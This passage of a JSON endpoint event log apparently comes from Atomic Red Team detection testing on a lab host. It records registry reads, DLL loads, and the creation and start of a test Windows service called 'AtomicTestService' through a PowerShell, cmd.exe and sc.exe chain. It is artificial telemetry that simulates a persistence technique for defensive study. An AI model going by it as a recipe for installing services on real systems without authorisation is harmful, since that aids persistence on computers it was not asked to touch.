131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844810016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 8148, - "process_name": "sc.exe", - "process_path": 
"C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_value": "AtomicTestService", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Type", - "registry_value": "Type", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", - "registry_value": "Start", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": 
"services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ErrorControl", - "registry_value": "ErrorControl", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath", - "registry_value": "ImagePath", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ObjectName", - "registry_value": "ObjectName", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "terminate", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "image_load", - "image_name": "sc.exe", - "image_path": "C:\\Windows\\System32\\sc.exe", - "pid": 8148, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" - }, - { - "event_type": "file", - "file_name": "SC.EXE-BC6DAF49.pf", - "file_path": "C:\\Windows\\Prefetch\\SC.EXE-BC6DAF49.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 
131883570844960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "file", - "file_name": "CMD.EXE-89305D47.pf", - "file_path": "C:\\Windows\\Prefetch\\CMD.EXE-89305D47.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe start AtomicTestService\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5588, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570845090000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - 
"image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844960000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "command_line": "sc.exe start AtomicTestService", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3448, - "ppid": 5588, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "create", - "timestamp": 131883570845200000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}", - "unique_ppid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "sc.exe", - "image_path": "C:\\Windows\\System32\\sc.exe", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - 
